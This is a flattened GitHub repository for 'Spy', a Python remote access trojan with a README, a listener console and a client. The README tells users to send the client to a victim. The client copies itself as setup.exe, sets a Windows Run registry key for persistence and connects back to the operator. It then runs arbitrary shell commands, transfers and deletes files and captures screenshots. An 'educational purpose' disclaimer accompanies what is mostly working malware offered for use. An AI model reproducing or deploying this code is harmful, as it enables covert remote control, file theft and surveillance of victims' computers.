├── LICENSE ├── README.md ├── .gitignore ├── listener.py └── client.py /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Svwbe 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

2 | 3 |

4 |

5 | 6 |

7 |

8 |

9 | 10 | 11 |

12 | 13 | 14 | 15 | 16 | 17 | 18 |

19 |

20 | Spy is a remote access trojan written in python with auto persistence option. 21 |

22 | 23 | 24 | ## Legal Disclamer: 25 | The author does not hold any responsibility for the bad use of this tool, 26 | remember this is only for educational purpose. 27 | 28 |

29 | 30 | 31 | ## Download/Config/Usage: 32 | 1 - Download the tool from github 33 | git clone https://github.com/yezz123/spy.git 34 | 35 | 2 - edit client.py : 36 | [!] Send this to Victim. After Changing Ip Address,port.in the line 76 37 | python client.py or compile it using Pyinstaller 38 | 39 | 3 - Run listener.py : 40 | python listener.py 41 | 42 |

43 | Follow Me On 44 |

45 |

46 | 47 | 48 | 49 | 50 | 51 | 52 |

53 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | pip-wheel-metadata/ 24 | share/python-wheels/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | MANIFEST 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .nox/ 44 | .coverage 45 | .coverage.* 46 | .cache 47 | nosetests.xml 48 | coverage.xml 49 | *.cover 50 | *.py,cover 51 | .hypothesis/ 52 | .pytest_cache/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | target/ 76 | 77 | # Jupyter Notebook 78 | .ipynb_checkpoints 79 | 80 | # IPython 81 | profile_default/ 82 | ipython_config.py 83 | 84 | # pyenv 85 | .python-version 86 | 87 | # pipenv 88 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 89 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 90 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 91 | # install all needed dependencies. 92 | #Pipfile.lock 93 | 94 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow 95 | __pypackages__/ 96 | 97 | # Celery stuff 98 | celerybeat-schedule 99 | celerybeat.pid 100 | 101 | # SageMath parsed files 102 | *.sage.py 103 | 104 | # Environments 105 | .env 106 | .venv 107 | env/ 108 | venv/ 109 | ENV/ 110 | env.bak/ 111 | venv.bak/ 112 | 113 | # Spyder project settings 114 | .spyderproject 115 | .spyproject 116 | 117 | # Rope project settings 118 | .ropeproject 119 | 120 | # mkdocs documentation 121 | /site 122 | 123 | # mypy 124 | .mypy_cache/ 125 | .dmypy.json 126 | dmypy.json 127 | 128 | # Pyre type checker 129 | .pyre/ 130 | -------------------------------------------------------------------------------- /listener.py: -------------------------------------------------------------------------------- 1 | # !}============================================================================{! 2 | # !} Author: Yezz123 {! 3 | # !} Instagram : https://www.instagram.com/sadnessvibewithbadeffect {! 4 | # !} write with : Python. {! 5 | # !} Product Name : Spy {! 6 | # !} __ A very stable python remote __ {! 7 | # !} [X] Only for Linux & Windows [X] {! 8 | # !} [X] If you Found a bug. Please contact me {! 9 | # !}============================================================================{! 10 | 11 | import socket 12 | import os,sys,select,time 13 | print """ 14 | +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 15 | 16 | ____________ ___.__. 17 | / ___/\____ < | | 18 | \___ \ | |_> >___ | 19 | /____ >| __// ____| 20 | \/ |__| \/ 21 | Yasser - @EliteStuff 22 | 23 | +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 24 | """ 25 | 26 | host=raw_input("host:") 27 | port=input("port:") 28 | clear=lambda:os.system('cls') 29 | c=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 30 | c.bind((host,port)) 31 | c.listen(100) 32 | active=False 33 | clients=[] 34 | socks=[] 35 | interval=0.8 36 | print '\nListening 4 clients.....\N' 37 | 38 | while True: 39 | try: 40 | c.settimeout(4) 41 | try: 42 | s,a=c.accept() 43 | except socket.timeout: 44 | continue 45 | if(a): 46 | s.settimeout(None) 47 | socks +=[s] 48 | clients +=[str(a)] 49 | clear() 50 | print '\nlistening for clients....\n' 51 | if len(clients)>0: 52 | for j in range(0,len(clients)): 53 | print '['+str((j+1))+']client:'+clients[j]+'\n' 54 | print 'press ctrl+C to interact with clinet.' 55 | time.sleep(interval) 56 | except KeyboardInterrupt: 57 | clear() 58 | print '\nlistening for clients....\n' 59 | if len(clients)>0: 60 | for j in range(0,len(clients)): 61 | print '['+str((j+1))+']client:'+clients[j]+'\n' 62 | print "...\n" 63 | print "[0] Exit \n" 64 | activate=input('\nEnter option.') 65 | if activate==0: 66 | print '\nExiting....\n' 67 | sys.exit() 68 | activate -=1 69 | clear() 70 | print'activing clinet.'+clients[activate]+'\n' 71 | active=True 72 | socks[activate].send('dir') 73 | while active: 74 | data=socks[activate].recv(5000) 75 | print data 76 | if data.startswith('Exit')==True: 77 | active=False 78 | print 'press ctrl+c to return to listener mode....' 79 | else: 80 | nextcmd=raw_input('shell$ ') 81 | socks[activate].send(nextcmd) 82 | if nextcmd.startswith("download")== True: 83 | 84 | downFile=nextcmd[9:] 85 | try: 86 | f=open(downFile,'wb') 87 | print 'downloading file',downFile 88 | while True: 89 | l=socks[activate].recv(5000) 90 | while 1: 91 | if l.endswith('EOFEOFX'): 92 | u=l[:-7] 93 | f.write(u) 94 | s.send("cls") 95 | print "file downloaded" 96 | break 97 | elif l.startswith('EOFEOFX'): 98 | break 99 | else: 100 | f.write(l) 101 | l=socks[activate].recv(5000) 102 | break 103 | f.close() 104 | except: 105 | pass 106 | 107 | elif nextcmd.startswith("cd")== True: 108 | path=nextcmd[3:] 109 | 110 | elif nextcmd.startswith("pic")== True: 111 | jgp=nextcmd[4:] 112 | downFile=nextcmd[4:] 113 | time.sleep(2) 114 | try: 115 | f=open(downFile,'wb') 116 | print 'downloading file',downFile 117 | while True: 118 | l=socks[activate].recv(512) 119 | while 1: 120 | if l.endswith('EOFEOFX'): 121 | u=l[:-7] 122 | f.write(u) 123 | s.send("cls") 124 | print "file downloaded" 125 | break 126 | elif l.startswith('EOFEOFX'): 127 | break 128 | else: 129 | f.write(l) 130 | l=socks[activate].recv(5000) 131 | break 132 | f.close() 133 | except: 134 | pass 135 | elif nextcmd.startswith("del")== True: 136 | file=nextcmd[4:] 137 | elif len(nextcmd)==0: 138 | socks[activate].send('dir') 139 | 140 | elif data.startswith('invalid')==True: 141 | print "invalid filename" 142 | 143 | elif nextcmd.startswith('upload')==True: 144 | sendFile=nextcmd[7:] 145 | time.sleep(.8) 146 | if os.path.isfile(sendFile): 147 | with open(sendFile,'rb')as f: 148 | while 1: 149 | filedata=f.read() 150 | if filedata=='':break 151 | socks[activate].sendall(filedata) 152 | f.close() 153 | time.sleep(0.8) 154 | socks[activate].sendall('EOFEOFX') 155 | else: 156 | print "Faild invalid file" 157 | socks[activate].send('EOFEOFX') 158 | pass -------------------------------------------------------------------------------- /client.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # ___ UTF-8* ___ 3 | # Simple Reverse Shell Written by: Yasser (Yezz123) 4 | # [NOTE] Only for Educational Purpose. [/NOTE] 5 | # 6 | # Patch / Client. 7 | # 8 | # [!] Send this to Victim. After Changing Ip Address,port.in the line 76 9 | 10 | import sys 11 | import socket,subprocess 12 | import traceback 13 | import time 14 | import os 15 | from PIL import ImageGrab 16 | import shutil 17 | from _winreg import * 18 | 19 | dist="" 20 | curntfile=sys.argv[0] 21 | servername="/setup.exe" 22 | username=os.getenv('USERNAME') 23 | 24 | if os.path.exists("C:/Documents and Settings/"+username): 25 | dist="C:/Documents and Settings/"+username+"/regky" 26 | print "found path", dist 27 | if not os.path.isdir(dist): 28 | os.mkdir(dist) 29 | try: 30 | shutil.copy2(curntfile, dist+servername) 31 | print "file copied to:",dist+servername 32 | aReg = ConnectRegistry(None,HKEY_CURRENT_USER) 33 | aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run") 34 | aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE) 35 | SetValueEx(aKey,"System explore",0, REG_SZ, "C:\\Documents and Settings\\"+username+"\\regky\\setup.exe" ) 36 | print "regkey added","C:\\Documents and Settings\\"+username+"\\regky\\setup.exe" 37 | except: 38 | pass 39 | 40 | elif os.path.exists("C:/Users/"+username): 41 | dist="C:/Users/"+username+"/regky" 42 | print "found path", dist 43 | if not os.path.isdir(dist): 44 | os.mkdir(dist) 45 | try: 46 | shutil.copy2(curntfile, dist+servername) 47 | print "file copied to:",dist+servername 48 | aReg = ConnectRegistry(None,HKEY_CURRENT_USER) 49 | aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run") 50 | aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE) 51 | SetValueEx(aKey,"System explore",0, REG_SZ, "C:\\Users\\"+username+"\\regky\\setup.exe" ) 52 | print "regkey added","C:\\Users\\"+username+"\\regky\\setup.exe" 53 | except: 54 | pass 55 | 56 | def do_work( forever = True): 57 | 58 | 59 | while True: 60 | 61 | t 62 | print "Creating the socket" 63 | s = socket.socket( socket.AF_INET, socket.SOCK_STREAM) 64 | s.settimeout( 5.0) 65 | 66 | 67 | x = s.getsockopt( socket.SOL_SOCKET, socket.SO_KEEPALIVE) 68 | if( x == 0): 69 | print 'Socket Keepalive off, turning on' 70 | x = s.setsockopt( socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1) 71 | print 'setsockopt=', x 72 | else: 73 | print 'Socket Keepalive already on' 74 | 75 | try: 76 | s.connect(('192.168.1.2',666)) #YOUR IP AND PORT FOR REVERSE CONNECTION 77 | except socket.error: 78 | print 'Socket connect failed! Loop up and try socket again' 79 | time.sleep( 10) 80 | continue 81 | 82 | print 'Socket connect worked!' 83 | 84 | while 1: 85 | try: 86 | data = s.recv(1024) 87 | if data == "quit": 88 | break 89 | elif data.startswith('download')==True: 90 | sendFile=data[9:] 91 | time.sleep(.5) 92 | if os.path.isfile(sendFile): 93 | with open(sendFile,'rb')as f: 94 | while 1: 95 | filedata=f.read() 96 | if filedata==None:break 97 | s.sendall(filedata) 98 | f.close() 99 | time.sleep(0.8) 100 | s.sendall('EOFEOFX') 101 | else: 102 | s.send('EOFEOFX') 103 | s.send('invalid filename') 104 | 105 | elif data.startswith('invalid')==True: 106 | s.send('falid invalid filename') 107 | 108 | elif data.startswith('del')==True: 109 | filename=data[4:] 110 | try: 111 | os.remove(filename) 112 | s.send('Deleted') 113 | except os.error: 114 | s.send('Invalid filename') 115 | 116 | 117 | elif data.startswith('cd')==True: 118 | path=data[3:] 119 | try: 120 | os.chdir(path) 121 | s.sendall(os.getcwd()) 122 | except: 123 | s.send("path not found") 124 | 125 | elif data.startswith('pic')==True: 126 | image=data[4:] 127 | ImageGrab.grab().save(image, "PNG") 128 | s.send('image saved') 129 | 130 | elif data.startswith("upload")== True: 131 | downFile=data[7:] 132 | try: 133 | f=open(downFile,'wb') 134 | while True: 135 | l=s.recv(1024) 136 | while 1: 137 | if l.endswith('EOFEOFX'): 138 | u=l[:-7] 139 | f.write(u) 140 | break 141 | else: 142 | f.write(l) 143 | l=s.recv(1024) 144 | break 145 | f.close() 146 | s.send('Done') 147 | except: 148 | pass 149 | 150 | else: 151 | 152 | proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) 153 | 154 | stdout_value = proc.stdout.read() + proc.stderr.read() 155 | 156 | 157 | if len(stdout_value)==0: 158 | s.send("command successfull") 159 | else: 160 | s.send(stdout_value) 161 | 162 | except socket.timeout: 163 | print 'Socket timeout, loop and try recv() again' 164 | time.sleep(0) 165 | 166 | continue 167 | 168 | except: 169 | traceback.print_exc() 170 | print 'Other Socket err, exit and try creating socket again' 171 | break 172 | 173 | try: 174 | s.close() 175 | except: 176 | pass 177 | 178 | 179 | if __name__ == '__main__': 180 | 181 | do_work( True) --------------------------------------------------------------------------------